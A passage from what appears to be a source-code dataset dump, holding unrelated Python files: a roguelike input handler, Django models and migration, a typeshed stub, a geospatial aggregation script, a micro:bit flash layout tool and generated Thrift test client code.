['Chevrolet', 'GMC'],
['Ferrari', 'Lamborghini']
]
]
#print(lot_3D[0])
# print(lot_3D[0][0])
#print(lot_3D[0][0][1])
for grupo in lot_3D:
for line in grupo:
for carro in line:
print(carro) | [
"[email protected]"
] | |
5ea3abe3100127da5d59957fa8e7d512baa17b7f | 9a7b7f90aa62ce52643e2df83d8aef7ba7803afd | /src/input_handlers/inventory_drop_handler.py | f467da4003f1c32e9ad309fed15c3b0a08d53594 | [] | no_license | voidnologo/tcod_roguelike | d82a060a94784a18156fefe105a3e26a540525e9 | 23d806f960134c17ccbd4e6ca5527f35e654df65 | refs/heads/main | 2023-02-28T11:05:52.809161 | 2021-02-07T16:36:38 | 2021-02-07T16:36:38 | 331,168,875 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 336 | py | import actions
from input_handlers.inventory_event_handler import InventoryEventHandler
class InventoryDropHandler(InventoryEventHandler):
"""
Handle dropping an inventory item
"""
TITLE = 'Select an item to drop'
def on_item_selected(self, item):
return actions.DropItemAction(self.engine.player, item)
| [
"(none)"
] | (none) |
e5fc3b96e27fd580d60715aa2a9faae4dfa0113f | 7f7ba9fa96eb7741e3a7956aae439802376099d1 | /excel_sync/db/models/mixins.py | 27dc97215b789f0bf7f1c8a652037d36b68db776 | [
"BSD-3-Clause"
] | permissive | FriedrichK/django-excel-sync | bd34911960fab6580985378da7427f7823163bf7 | 3e649231dcdd26b29278dc2e9563ad0ab67d9f1c | refs/heads/master | 2021-01-02T14:46:34.420031 | 2014-04-21T09:59:47 | 2014-04-21T09:59:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,270 | py | from excel_sync.db.models.fields import SpreadsheetMixin
class SpreadsheetModelMixin:
@staticmethod
def import_spreadsheet_data(klass):
source = get_spreadsheet_datasource(klass)
fields_with_spreadsheet_metadata = get_fields_with_spreadsheet_metadata(klass)
field_settings = build_field_settings(fields_with_spreadsheet_metadata)
data_for_rows = source.get_rows(field_settings)
for data_for_row in data_for_rows:
entry = klass(**data_for_row)
entry.save()
def get_spreadsheet_datasource(klass):
return klass._meta.spreadsheet_source
def get_fields_with_spreadsheet_metadata(klass):
all_fields = klass._meta.fields
fields_with_spreadsheet_metadata = []
for field in all_fields:
if(has_spreadsheet_metadata(field)):
fields_with_spreadsheet_metadata.append(field)
return fields_with_spreadsheet_metadata
def has_spreadsheet_metadata(field):
return isinstance(field, SpreadsheetMixin)
def build_field_settings(fields_with_spreadsheet_metadata):
field_settings = []
for field in fields_with_spreadsheet_metadata:
field_setting = field.get_spreadsheet_settings()
field_settings.append(field_setting)
return field_settings
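# Illustrative sketch (not part of this package; the class below is
# hypothetical): import_spreadsheet_data only requires the object stored on
# _meta.spreadsheet_source to expose get_rows(field_settings), returning one
# {field_name: value} dict per spreadsheet row.
class InMemoryDatasource(object):
    def __init__(self, rows):
        self._rows = rows

    def get_rows(self, field_settings):
        # a real datasource would use the per-field settings to map
        # spreadsheet columns onto model fields; this stub ignores them
        return self._rows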
| [
"[email protected]"
] | |
ff93f4c4e03c2723185097e82af8b56b2598c151 | 16be53c2dc4eee5602d3f7a38c599917009fb802 | /account/migrations/0002_remove_profile_address.py | 02e0e499ef82da7cbf16355972f4610131d12c84 | [] | no_license | surajit003/mubango | 35f37fb992782ae168a407922b494c3be0605e00 | 603e13cd07417d200330ca7292d9032af568a0b9 | refs/heads/main | 2023-03-28T07:59:57.967026 | 2021-03-27T09:34:46 | 2021-03-27T09:34:46 | 315,040,701 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 319 | py | # Generated by Django 3.0.4 on 2021-01-12 21:06
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("account", "0001_initial"),
]
operations = [
migrations.RemoveField(
model_name="profile",
name="address",
),
]
| [
"[email protected]"
] | |
7111f32084156c05493026e38ec44b185622bb09 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_198/ch73_2019_09_03_19_31_47_647277.py | 33be594abb99268b65cbb1ae31306829a17afa62 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 126 | py | def remove_vogais(palavra):
return palavra.replace('a','').replace('e','').replace('i','').replace('o','').replace('u','') | [
"[email protected]"
] | |
2398d673bdef1187105868a48ac3e87d4555d20f | 3c01d7928029e74a19d646f5a40b3bf099b281a7 | /typeshed/stdlib/mimetypes.pyi | 5a3ec91acbcdb71fb39f59656555c7233be0d66e | [
"MIT"
] | permissive | arpancodes/protectsql | f3ced238c103fca72615902a9cb719c44ee2b5ba | 6392bb7a86d1f62b86faf98943a302f7ea3fce4c | refs/heads/main | 2023-08-07T16:33:57.496144 | 2021-09-24T19:44:51 | 2021-09-24T19:44:51 | 409,894,807 | 0 | 1 | MIT | 2021-09-24T19:44:52 | 2021-09-24T08:46:02 | Python | UTF-8 | Python | false | false | 1,554 | pyi | import sys
from _typeshed import StrPath
from typing import IO, Sequence, Tuple
if sys.version_info >= (3, 8):
def guess_type(url: StrPath, strict: bool = ...) -> Tuple[str | None, str | None]: ...
else:
def guess_type(url: str, strict: bool = ...) -> Tuple[str | None, str | None]: ...
def guess_all_extensions(type: str, strict: bool = ...) -> list[str]: ...
def guess_extension(type: str, strict: bool = ...) -> str | None: ...
def init(files: Sequence[str] | None = ...) -> None: ...
def read_mime_types(file: str) -> dict[str, str] | None: ...
def add_type(type: str, ext: str, strict: bool = ...) -> None: ...
inited: bool
knownfiles: list[str]
suffix_map: dict[str, str]
encodings_map: dict[str, str]
types_map: dict[str, str]
common_types: dict[str, str]
class MimeTypes:
suffix_map: dict[str, str]
encodings_map: dict[str, str]
types_map: Tuple[dict[str, str], dict[str, str]]
types_map_inv: Tuple[dict[str, str], dict[str, str]]
def __init__(self, filenames: Tuple[str, ...] = ..., strict: bool = ...) -> None: ...
def guess_extension(self, type: str, strict: bool = ...) -> str | None: ...
def guess_type(self, url: str, strict: bool = ...) -> Tuple[str | None, str | None]: ...
def guess_all_extensions(self, type: str, strict: bool = ...) -> list[str]: ...
def read(self, filename: str, strict: bool = ...) -> None: ...
def readfp(self, fp: IO[str], strict: bool = ...) -> None: ...
if sys.platform == "win32":
def read_windows_registry(self, strict: bool = ...) -> None: ...
| [
"[email protected]"
] | |
b4891a5b540f1bd8e420aa57dab3d7ec38f825b6 | 232d0a99df3ad03ce7811b4e96ebb6982cc0f865 | /aggregate.py | 396c21a0343add8ef7e949e48692f0f5f77f2ad8 | [] | no_license | tomalrussell/aggregation-case-study | 9e6db17e3a43f436dfce8cb84e608cb61b607239 | d23217d94e61d89043baffcfd157883fc474b8ae | refs/heads/master | 2020-06-23T03:46:44.340892 | 2016-11-24T11:23:43 | 2016-11-24T11:23:43 | 74,666,760 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,478 | py | from __future__ import print_function
import argparse
from collections import namedtuple
import fiona
from shapely.geometry import shape
from rtree import index
def proportion_of_a_intersecting_b(a, b):
intersection = a.intersection(b)
return intersection.area / a.area
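# Quick illustrative check (not part of the original script): a unit square
# half-covered by another square contributes half of its attribute value.
# >>> from shapely.geometry import box
# >>> proportion_of_a_intersecting_b(box(0, 0, 1, 1), box(0.5, 0, 2, 1))
# 0.5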
ShapeWithValue = namedtuple('ShapeWithValue', ['shape', 'value'])
def aggregate(input_file, output_file, reporting_geometry, reporting_initial_value, reporting_attribute, reporting_attribute_type):
input_features = []
idx = index.Index()
with fiona.drivers():
with fiona.open(input_file) as input_src:
for feature in input_src:
s = ShapeWithValue(
shape=shape(feature['geometry']),
value=feature['properties'][reporting_attribute]
)
input_features.append(s)
# Populate R-tree index with bounds of input features
for pos, feature in enumerate(input_features):
idx.insert(pos, feature.shape.bounds)
with fiona.open(reporting_geometry) as reporting_src:
sink_schema = reporting_src.schema.copy()
sink_schema['properties'][reporting_attribute] = reporting_attribute_type
with fiona.open(
output_file, 'w',
crs=reporting_src.crs,
driver="ESRI Shapefile",
schema=sink_schema) as reporting_sink:
for reporting_feature in reporting_src:
reporting_shape = shape(reporting_feature['geometry'])
reporting_value = reporting_initial_value
# look up bbox intersecting features in R-tree
intersecting_features = [input_features[pos] for pos in idx.intersection(reporting_shape.bounds)]
for input_feature in intersecting_features:
# find proportion of input feature that intersects
proportion = proportion_of_a_intersecting_b(input_feature.shape, reporting_shape)
# add that proportion of the attribute_to_report to the reporting_value
reporting_value = reporting_value + proportion * input_feature.value
print(reporting_value)
reporting_feature['properties'][reporting_attribute] = reporting_value
reporting_sink.write(reporting_feature)
def setup_parser():
"""Parse command line arguments
"""
parser = argparse.ArgumentParser(description='Aggregate a value from one geometry to another.')
parser.add_argument('-i', '--input-file',
required=True,
help='Path to the input file, containing the data to be aggregated.')
parser.add_argument('-o', '--output-file',
required=True,
help='Path to the output file.')
parser.add_argument('-rg', '--reporting-geometry',
required=True,
help='Path to the reporting geometry file, containing geometry to be used as output.')
parser.add_argument('-ri', '--reporting-initial-value',
required=True,
help='Initial value for the attribute to output (used if no geometries intersect)')
parser.add_argument('-ra', '--reporting-attribute',
required=True,
help='Attribute name')
parser.add_argument('-rt', '--reporting-attribute-type',
required=True,
choices=['int', 'str', 'float'],
help='Type of value (can be "int", "str" or "float")')
parsed_args = parser.parse_args()
if parsed_args.reporting_attribute_type == 'int':
parsed_args.reporting_initial_value = int(parsed_args.reporting_initial_value)
if parsed_args.reporting_attribute_type == 'str':
parsed_args.reporting_initial_value = str(parsed_args.reporting_initial_value)
if parsed_args.reporting_attribute_type == 'float':
parsed_args.reporting_initial_value = float(parsed_args.reporting_initial_value)
return parsed_args
if __name__ == '__main__':
args = setup_parser()
"""Example usage:
python aggregate.py \
-i data/oa/england_oa_2011_clipped_with_pop.shp \
-o data/grid_with_pop.shp \
-rg data/grid.shp \
-ri 0 -ra pop -rt int
"""
aggregate(
args.input_file,
args.output_file,
args.reporting_geometry,
args.reporting_initial_value,
args.reporting_attribute,
args.reporting_attribute_type
)
| [
"[email protected]"
] | |
ba683fa2671b6bcd12fa5fce3c7356675c5f5a60 | db697271157368eb39ee9d9479d0c6a7eb9d06dd | /virtual/bin/easy_install | f22e90e735bfeae51bc3a727bc7716715ebadcd1 | [
"MIT"
] | permissive | amoskipz/instagram | 5edaf03fd784c44fb325dc9f294fab41acc7bc4c | 120e5ef1213567297689e04d5b8620508ce18fea | refs/heads/master | 2023-04-09T13:09:27.379801 | 2021-04-10T17:29:14 | 2021-04-10T17:29:14 | 352,740,611 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 278 | #!/home/moringa/Desktop/amoz/amosinstagram/virtual/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | ||
0571f647ae3ab197917c302a532b8449f7afe44d | f504253210cec1c4ec6c3ea50a45564db7d6cd7f | /scripts/parse_pyi.py | d4b35524274e7a8a2fb6d2ba5b401434ca6486d5 | [
"MIT"
] | permissive | phil65/PrettyQt | b1150cb4dce982b9b8d62f38f56694959b720a3e | f00500d992d1befb0f2c2ae62fd2a8aafba7fd45 | refs/heads/master | 2023-08-30T21:00:08.905444 | 2023-08-17T12:24:45 | 2023-08-17T12:24:45 | 177,451,205 | 17 | 5 | MIT | 2020-08-15T22:21:18 | 2019-03-24T18:10:21 | Python | UTF-8 | Python | false | false | 1,049 | py | import pathlib
import sys
from typed_ast import ast3
def add_parents(tree):
for node in ast3.walk(tree):
for child in ast3.iter_child_nodes(node):
child.parent = node # type: ignore
def find_enums(tree):
for node in ast3.walk(tree):
if not isinstance(node, ast3.Assign):
continue
if node.type_comment is None:
continue
if "." not in node.type_comment:
continue
if not node.type_comment.startswith("'"):
continue
comment = node.type_comment.strip("'")
mod, cls = comment.rsplit(".", maxsplit=1)
assert len(node.targets) == 1
name = node.targets[0].id # type: ignore
yield (mod, cls, name)
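# Illustrative input/output (the stub line below is an assumption): given a
# .pyi assignment such as
#     AlignLeft = ...  # type: 'QtCore.Qt.AlignmentFlag'
# find_enums yields ("QtCore.Qt", "AlignmentFlag", "AlignLeft"), and main()
# prints the rename pair:
#     QtCore.Qt.AlignLeft QtCore.Qt.AlignmentFlag.AlignLeft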
def main():
for filename in sys.argv[1:]:
tree = ast3.parse(pathlib.Path(filename).read_text())
for mod, cls, name in find_enums(tree):
old = f"{mod}.{name}"
new = f"{mod}.{cls}.{name}"
print(f"{old} {new}")
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
59de5f4d684f1fcbb412201731cec5a17abe4081 | 08f42d68aaea64c986a532b86562365f2a6fe3b5 | /src/addlayouttable.py | 3e32ab12ae34fdcd43ccd0ad5cf36d01a2dfbff6 | [
"MIT"
] | permissive | sos82/micropython-microbit-v2 | da65da0c4ae8a3e2189bb598f75fec43d4628007 | a44573c623a9e935257c8db51a3f0c2e75ea10aa | refs/heads/master | 2023-07-19T07:03:40.101099 | 2021-09-11T15:13:42 | 2021-09-11T15:13:42 | 402,835,132 | 0 | 0 | MIT | 2021-09-11T15:13:43 | 2021-09-03T16:35:34 | null | UTF-8 | Python | false | false | 7,683 | py | #!/usr/bin/env python3
"""
Add a flash layout table to a hex firmware for MicroPython on the micro:bit.
Usage: ./addlayouttable.py <firmware.hex> <firmware.map> [-o <combined.hex>]
Output goes to stdout if no filename is given.
The layout table is a sequence of 16-byte entries. The last entry contains the
header (including magic numbers) and is aligned to the end of a page such that
the final byte of the layout table is the final byte of the page it resides in.
This is so it can be quickly and easily searched for.
The layout table has the following format. All integer values are unsigned and
stored little endian.
0x00 0x01 0x02 0x03 0x04 0x05 0x06 0x07 0x08 0x09 0x0a 0x0b 0x0c 0x0d 0x0e 0x0f
ID   HT   REG_PAGE  REG_LEN             HASH_DATA
(additional regions)
...
MAGIC1              VERSION   TABLE_LEN NUM_REG   PSIZE_LOG2 MAGIC2
The values are:
ID - 1 byte - region id for this entry, defined by the region
HT - 1 byte - hash type of the region hash data
REG_PAGE - 2 bytes - starting page number of the region
REG_LEN - 4 bytes - length in bytes of the region
HASH_DATA - 8 bytes - data for the hash of this region
HT=0: hash data is empty
HT=1: hash data contains 8 bytes of verbatim data
HT=2: hash data contains a 4-byte pointer to a string
MAGIC1 - 4 bytes - 0x597F30FE
VERSION - 2 bytes - table version (currently 1)
TABLE_LEN - 2 bytes - length in bytes of the table excluding this header row
NUM_REG - 2 bytes - number of regions
PSIZE_LOG2 - 2 bytes - native page size of the flash, log-2
MAGIC2 - 4 bytes - 0xC1B1D79D
"""
import argparse
import binascii
import struct
import sys
IHEX_TYPE_DATA = 0
IHEX_TYPE_EXT_LIN_ADDR = 4
NRF_PAGE_SIZE_LOG2 = 12
NRF_PAGE_SIZE = 1 << NRF_PAGE_SIZE_LOG2
class FlashLayout:
MAGIC1 = 0x597F30FE
MAGIC2 = 0xC1B1D79D
VERSION = 1
REGION_HASH_NONE = 0
REGION_HASH_DATA = 1
REGION_HASH_PTR = 2
def __init__(self):
self.data = b""
self.num_regions = 0
def add_region(
self, region_id, region_addr, region_len, region_hash_type, region_hash=None
):
# Compute/validate the hash data.
if region_addr % NRF_PAGE_SIZE != 0:
assert 0, region_addr
if region_hash_type == FlashLayout.REGION_HASH_NONE:
assert region_hash is None
region_hash = b"\x00" * 8
elif region_hash_type == FlashLayout.REGION_HASH_DATA:
assert len(region_hash) == 8
elif region_hash_type == FlashLayout.REGION_HASH_PTR:
region_hash = struct.pack("<II", region_hash, 0)
# Increase number of regions.
self.num_regions += 1
# Add the region data.
self.data += struct.pack(
"<BBHI8s",
region_id,
region_hash_type,
region_addr // NRF_PAGE_SIZE,
region_len,
region_hash,
)
def finalise(self):
# Add padding to data to align it to 16 bytes.
if len(self.data) % 16 != 0:
            self.data += b"\xff" * (16 - len(self.data) % 16)
# Add 16-byte "header" at the end with magic numbers and meta data.
self.data += struct.pack(
"<IHHHHI",
FlashLayout.MAGIC1,
FlashLayout.VERSION,
len(self.data),
self.num_regions,
NRF_PAGE_SIZE_LOG2,
FlashLayout.MAGIC2,
)
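# Illustrative reader (not used by this tool; names are assumptions): given
# the raw bytes of the flash page whose final byte is the final byte of the
# layout table, recover the header fields and region entries described above.
def parse_layout_table(page):
    magic1, version, table_len, num_reg, psize_log2, magic2 = struct.unpack(
        "<IHHHHI", page[-16:]
    )
    assert magic1 == FlashLayout.MAGIC1 and magic2 == FlashLayout.MAGIC2
    table = page[-16 - table_len : -16]  # entries (+ padding) precede the header
    regions = []
    for i in range(num_reg):
        region_id, hash_type, reg_page, reg_len, hash_data = struct.unpack(
            "<BBHI8s", table[i * 16 : (i + 1) * 16]
        )
        regions.append((region_id, hash_type, reg_page << psize_log2, reg_len, hash_data))
    return version, regions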
def make_ihex_record(addr, type, data):
record = struct.pack(">BHB", len(data), addr & 0xFFFF, type) + data
checksum = (-(sum(record))) & 0xFF
return ":%s%02X" % (str(binascii.hexlify(record), "utf8").upper(), checksum)
def parse_map_file(filename, symbols):
parse_symbols = False
with open(filename) as f:
for line in f:
line = line.strip()
if line == "Linker script and memory map":
parse_symbols = True
elif parse_symbols and line.startswith("0x00"):
line = line.split()
if len(line) >= 2 and line[1] in symbols:
symbols[line[1]] = int(line[0], 16)
def output_firmware(dest, firmware, layout_addr, layout_data):
# Output head of firmware.
for line in firmware[:-2]:
print(line, end="", file=dest)
# Output layout data.
print(
make_ihex_record(
0,
IHEX_TYPE_EXT_LIN_ADDR,
struct.pack(">H", layout_addr >> 16),
),
file=dest,
)
for i in range(0, len(layout_data), 16):
chunk = layout_data[i : min(i + 16, len(layout_data))]
print(
make_ihex_record(layout_addr + i, IHEX_TYPE_DATA, chunk),
file=dest,
)
# Output tail of firmware.
print(firmware[-2], end="", file=dest)
print(firmware[-1], end="", file=dest)
def main():
arg_parser = argparse.ArgumentParser(
description="Add UICR region to hex firmware for the micro:bit."
)
arg_parser.add_argument(
"-o",
"--output",
default=sys.stdout,
type=argparse.FileType("wt"),
help="output file (default is stdout)",
)
arg_parser.add_argument("firmware", nargs=1, help="input MicroPython firmware")
arg_parser.add_argument(
"mapfile",
nargs=1,
help="input map file",
)
args = arg_parser.parse_args()
# Read in the firmware from the given hex file.
with open(args.firmware[0], "rt") as f:
firmware = f.readlines()
# Parse the linker map file, looking for the following symbols.
symbols = {
key: None
for key in [
"_binary_softdevice_bin_start",
"__isr_vector",
"__etext",
"__data_start__",
"__data_end__",
"_fs_start",
"_fs_end",
"microbit_version_string",
]
}
parse_map_file(args.mapfile[0], symbols)
# Get the required symbol addresses.
sd_start = symbols["_binary_softdevice_bin_start"]
sd_end = symbols["__isr_vector"]
mp_start = symbols["__isr_vector"]
data_len = symbols["__data_end__"] - symbols["__data_start__"]
mp_end = symbols["__etext"] + data_len
mp_version = symbols["microbit_version_string"]
fs_start = symbols["_fs_start"]
fs_end = symbols["_fs_end"]
# Make the flash layout information table.
layout = FlashLayout()
layout.add_region(1, sd_start, sd_end - sd_start, FlashLayout.REGION_HASH_NONE)
layout.add_region(
2, mp_start, mp_end - mp_start, FlashLayout.REGION_HASH_PTR, mp_version
)
layout.add_region(3, fs_start, fs_end - fs_start, FlashLayout.REGION_HASH_NONE)
layout.finalise()
# Compute layout address.
layout_addr = (
((mp_end >> NRF_PAGE_SIZE_LOG2) << NRF_PAGE_SIZE_LOG2)
+ NRF_PAGE_SIZE
- len(layout.data)
)
if layout_addr < mp_end:
layout_addr += NRF_PAGE_SIZE
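    # Worked example (illustrative numbers): with mp_end = 0x731a4 and a
    # 64-byte table (3 region entries + header), the page holding mp_end
    # starts at 0x73000, so layout_addr = 0x73000 + 0x1000 - 64 = 0x73fc0 and
    # the table's final byte is the final byte of that page, as the format
    # requires; the bump above handles a table that would otherwise overlap
    # the end of the MicroPython image.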
if layout_addr >= fs_start:
print("ERROR: Flash layout information overlaps with filesystem")
sys.exit(1)
# Print information.
if args.output is not sys.stdout:
fmt = "{:13} 0x{:05x}..0x{:05x}"
print(fmt.format("SoftDevice", sd_start, sd_end))
print(fmt.format("MicroPython", mp_start, mp_end))
print(fmt.format("Layout table", layout_addr, layout_addr + len(layout.data)))
print(fmt.format("Filesystem", fs_start, fs_end))
# Output the new firmware as a hex file.
output_firmware(args.output, firmware, layout_addr, layout.data)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
af3d10e72f46f60903f229b8c409d1372fd9b5e8 | b282ccdc65f969e45b36630f9008f54d2087b9c1 | /thrift-0.11.0/test/py/gen-py-slots/ThriftTest/ThriftTest.py | 3f67ce151c41cbf8af305c8a581a5e09db97f816 | [
"MIT",
"LicenseRef-scancode-public-domain-disclaimer",
"FSFAP",
"Apache-2.0"
] | permissive | jdencala10/Proyecto-Distribuidos | 36727fb314159393eda86385d8908bb3ae70a549 | 5b34ece54cc9e8240e9f0106ffbf76449fea507d | refs/heads/master | 2020-03-24T02:26:52.556503 | 2018-08-23T07:44:08 | 2018-08-23T07:44:08 | 142,375,884 | 1 | 0 | null | 2018-07-26T04:59:33 | 2018-07-26T02:10:13 | Python | UTF-8 | Python | false | true | 160,877 | py | #
# Autogenerated by Thrift Compiler (0.11.0)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py:slots
#
from thrift.Thrift import TType, TMessageType, TFrozenDict, TException, TApplicationException
from thrift.protocol.TProtocol import TProtocolException
from thrift.TRecursive import fix_spec
import sys
import logging
from .ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
all_structs = []
class Iface(object):
def testVoid(self):
"""
Prints "testVoid()" and returns nothing.
"""
pass
def testString(self, thing):
"""
Prints 'testString("%s")' with thing as '%s'
@param string thing - the string to print
@return string - returns the string 'thing'
Parameters:
- thing
"""
pass
def testBool(self, thing):
"""
        Prints 'testBool("%s")' where '%s' is 'true' or 'false' depending on thing
@param bool thing - the bool data to print
@return bool - returns the bool 'thing'
Parameters:
- thing
"""
pass
def testByte(self, thing):
"""
Prints 'testByte("%d")' with thing as '%d'
The types i8 and byte are synonyms, use of i8 is encouraged, byte still exists for the sake of compatibility.
@param byte thing - the i8/byte to print
@return i8 - returns the i8/byte 'thing'
Parameters:
- thing
"""
pass
def testI32(self, thing):
"""
Prints 'testI32("%d")' with thing as '%d'
@param i32 thing - the i32 to print
@return i32 - returns the i32 'thing'
Parameters:
- thing
"""
pass
def testI64(self, thing):
"""
Prints 'testI64("%d")' with thing as '%d'
@param i64 thing - the i64 to print
@return i64 - returns the i64 'thing'
Parameters:
- thing
"""
pass
def testDouble(self, thing):
"""
Prints 'testDouble("%f")' with thing as '%f'
@param double thing - the double to print
@return double - returns the double 'thing'
Parameters:
- thing
"""
pass
def testBinary(self, thing):
"""
Prints 'testBinary("%s")' where '%s' is a hex-formatted string of thing's data
@param binary thing - the binary data to print
@return binary - returns the binary 'thing'
Parameters:
- thing
"""
pass
def testStruct(self, thing):
"""
Prints 'testStruct("{%s}")' where thing has been formatted into a string of comma separated values
@param Xtruct thing - the Xtruct to print
@return Xtruct - returns the Xtruct 'thing'
Parameters:
- thing
"""
pass
def testNest(self, thing):
"""
Prints 'testNest("{%s}")' where thing has been formatted into a string of the nested struct
@param Xtruct2 thing - the Xtruct2 to print
@return Xtruct2 - returns the Xtruct2 'thing'
Parameters:
- thing
"""
pass
def testMap(self, thing):
"""
        Prints 'testMap("{%s}")' where thing has been formatted into a string of 'key => value' pairs
separated by commas and new lines
@param map<i32,i32> thing - the map<i32,i32> to print
@return map<i32,i32> - returns the map<i32,i32> 'thing'
Parameters:
- thing
"""
pass
def testStringMap(self, thing):
"""
Prints 'testStringMap("{%s}")' where thing has been formatted into a string of 'key => value' pairs
separated by commas and new lines
@param map<string,string> thing - the map<string,string> to print
@return map<string,string> - returns the map<string,string> 'thing'
Parameters:
- thing
"""
pass
def testSet(self, thing):
"""
Prints 'testSet("{%s}")' where thing has been formatted into a string of values
separated by commas and new lines
@param set<i32> thing - the set<i32> to print
@return set<i32> - returns the set<i32> 'thing'
Parameters:
- thing
"""
pass
def testList(self, thing):
"""
Prints 'testList("{%s}")' where thing has been formatted into a string of values
separated by commas and new lines
@param list<i32> thing - the list<i32> to print
@return list<i32> - returns the list<i32> 'thing'
Parameters:
- thing
"""
pass
def testEnum(self, thing):
"""
Prints 'testEnum("%d")' where thing has been formatted into it's numeric value
@param Numberz thing - the Numberz to print
@return Numberz - returns the Numberz 'thing'
Parameters:
- thing
"""
pass
def testTypedef(self, thing):
"""
Prints 'testTypedef("%d")' with thing as '%d'
@param UserId thing - the UserId to print
@return UserId - returns the UserId 'thing'
Parameters:
- thing
"""
pass
def testMapMap(self, hello):
"""
Prints 'testMapMap("%d")' with hello as '%d'
@param i32 hello - the i32 to print
@return map<i32,map<i32,i32>> - returns a dictionary with these values:
{-4 => {-4 => -4, -3 => -3, -2 => -2, -1 => -1, }, 4 => {1 => 1, 2 => 2, 3 => 3, 4 => 4, }, }
Parameters:
- hello
"""
pass
def testInsanity(self, argument):
"""
        So you think you've got this all worked out, eh?
        Creates the returned map with these values and prints it out:
{ 1 => { 2 => argument,
3 => argument,
},
2 => { 6 => <empty Insanity struct>, },
}
@return map<UserId, map<Numberz,Insanity>> - a map with the above values
Parameters:
- argument
"""
pass
def testMulti(self, arg0, arg1, arg2, arg3, arg4, arg5):
"""
Prints 'testMulti()'
@param i8 arg0 -
@param i32 arg1 -
@param i64 arg2 -
@param map<i16, string> arg3 -
@param Numberz arg4 -
@param UserId arg5 -
        @return Xtruct - returns an Xtruct with string_thing = "Hello2", byte_thing = arg0, i32_thing = arg1
and i64_thing = arg2
Parameters:
- arg0
- arg1
- arg2
- arg3
- arg4
- arg5
"""
pass
def testException(self, arg):
"""
Print 'testException(%s)' with arg as '%s'
        @param string arg - a string indicating what type of exception to throw
        if arg == "Xception" throw Xception with errorCode = 1001 and message = arg
        else if arg == "TException" throw TException
else do not throw anything
Parameters:
- arg
"""
pass
def testMultiException(self, arg0, arg1):
"""
Print 'testMultiException(%s, %s)' with arg0 as '%s' and arg1 as '%s'
        @param string arg - a string indicating what type of exception to throw
        if arg0 == "Xception" throw Xception with errorCode = 1001 and message = "This is an Xception"
        else if arg0 == "Xception2" throw Xception2 with errorCode = 2002 and struct_thing.string_thing = "This is an Xception2"
else do not throw anything
@return Xtruct - an Xtruct with string_thing = arg1
Parameters:
- arg0
- arg1
"""
pass
def testOneway(self, secondsToSleep):
"""
Print 'testOneway(%d): Sleeping...' with secondsToSleep as '%d'
sleep 'secondsToSleep'
Print 'testOneway(%d): done sleeping!' with secondsToSleep as '%d'
@param i32 secondsToSleep - the number of seconds to sleep
Parameters:
- secondsToSleep
"""
pass
class Client(Iface):
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot is not None:
self._oprot = oprot
self._seqid = 0
def testVoid(self):
"""
Prints "testVoid()" and returns nothing.
"""
self.send_testVoid()
self.recv_testVoid()
def send_testVoid(self):
self._oprot.writeMessageBegin('testVoid', TMessageType.CALL, self._seqid)
args = testVoid_args()
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testVoid(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testVoid_result()
result.read(iprot)
iprot.readMessageEnd()
return
def testString(self, thing):
"""
Prints 'testString("%s")' with thing as '%s'
@param string thing - the string to print
@return string - returns the string 'thing'
Parameters:
- thing
"""
self.send_testString(thing)
return self.recv_testString()
def send_testString(self, thing):
self._oprot.writeMessageBegin('testString', TMessageType.CALL, self._seqid)
args = testString_args()
args.thing = thing
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testString(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testString_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "testString failed: unknown result")
def testBool(self, thing):
"""
Prints 'testBool("%s")' where '%s' is thing rendered as 'true' or 'false'
@param bool thing - the bool data to print
@return bool - returns the bool 'thing'
Parameters:
- thing
"""
self.send_testBool(thing)
return self.recv_testBool()
def send_testBool(self, thing):
self._oprot.writeMessageBegin('testBool', TMessageType.CALL, self._seqid)
args = testBool_args()
args.thing = thing
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testBool(self):
iprot = self._iprot
(fname, mtype, rseqid) = iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(iprot)
iprot.readMessageEnd()
raise x
result = testBool_result()
result.read(iprot)
iprot.readMessageEnd()
if result.success is not None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "testBool failed: unknown result")
def testByte(self, thing):
"""
Prints 'testByte("%d")' with thing as '%d'
The types i8 and byte are synonyms; use of i8 is encouraged, while byte remains for backwards compatibility.
@param byte thing - the i8/byte to print
@return i8 - returns the i8/byte 'thing'
Parameters:
- thing
"""
self.send_testByte(thing)
return self.recv_testByte()
def send_testByte(self, thing):
self._oprot.writeMessageBegin('testByte', TMessageType.CALL, self._seqid)
args = testByte_args()
args.thing = thing
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_testByte(self):
iprot = self._iprot
